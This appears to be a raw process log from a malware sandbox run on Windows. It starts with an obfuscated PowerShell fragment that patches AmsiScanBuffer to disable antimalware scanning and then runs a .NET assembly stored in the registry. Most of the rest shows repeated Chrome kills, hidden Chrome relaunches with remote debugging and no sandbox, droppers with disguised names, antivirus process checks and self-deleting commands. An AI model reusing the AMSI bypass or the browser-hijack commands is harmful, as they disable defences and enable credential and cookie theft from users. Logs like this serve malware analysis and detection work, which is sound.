$_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+'ll')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+'o'+'so'+[Char](102)+''+'t'+'.'+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+'s');$GhnaXaSdbUhylH=$lEEpcPeWgbqjE.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+'o'+[Char](99)+'Ad'+[Char](100)+'r'+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DIOUIrvOSfgWoJRURYl=rxUZSeucghvE @([String])([IntPtr]);$fVJvxeIMIaAKBIppKiOpBK=rxUZSeucghvE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$InhSEnuVnzP=$lEEpcPeWgbqjE.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'el3'+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ZNZGdYqEptPMOz=$GhnaXaSdbUhylH.Invoke($Null,@([Object]$InhSEnuVnzP,[Object]('L'+'o'+''+'a'+''+[Char](100)+'Li'+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$tAyRzHzFGduBivAvn=$GhnaXaSdbUhylH.Invoke($Null,@([Object]$InhSEnuVnzP,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$OEeIiUk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZNZGdYqEptPMOz,$DIOUIrvOSfgWoJRURYl).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$VTLUQUXkcFxmEkjxZ=$GhnaXaSdbUhylH.Invoke($Null,@([Object]$OEeIiUk,[Object](''+'A'+'m'+'s'+'i'+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$iiYEfOiPLZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAyRzHzFGduBivAvn,$fVJvxeIMIaAKBIppKiOpBK).Invoke($VTLUQUXkcFxmEkjxZ,[uint32]8,4,[ref]$iiYEfOiPLZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VTLUQUXkcFxmEkjxZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAyRzHzFGduBivAvn,$fVJvxeIMIaAKBIppKiOpBK).Invoke($VTLUQUXkcFxmEkjxZ,[uint32]8,0x20,[ref]$iiYEfOiPLZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+''+'t'+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Local\Temp\275919514.exe
C:\Users\Admin\AppData\Local\Temp\275919514.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5772 -ip 5772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1312
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\Desktop\Files\2.exe
"C:\Users\Admin\Desktop\Files\2.exe"
C:\Users\Admin\Desktop\Files\t.exe
"C:\Users\Admin\Desktop\Files\t.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5908 -ip 5908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 444
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Local\Temp\1014487001\81c18992ca.exe
"C:\Users\Admin\AppData\Local\Temp\1014487001\81c18992ca.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
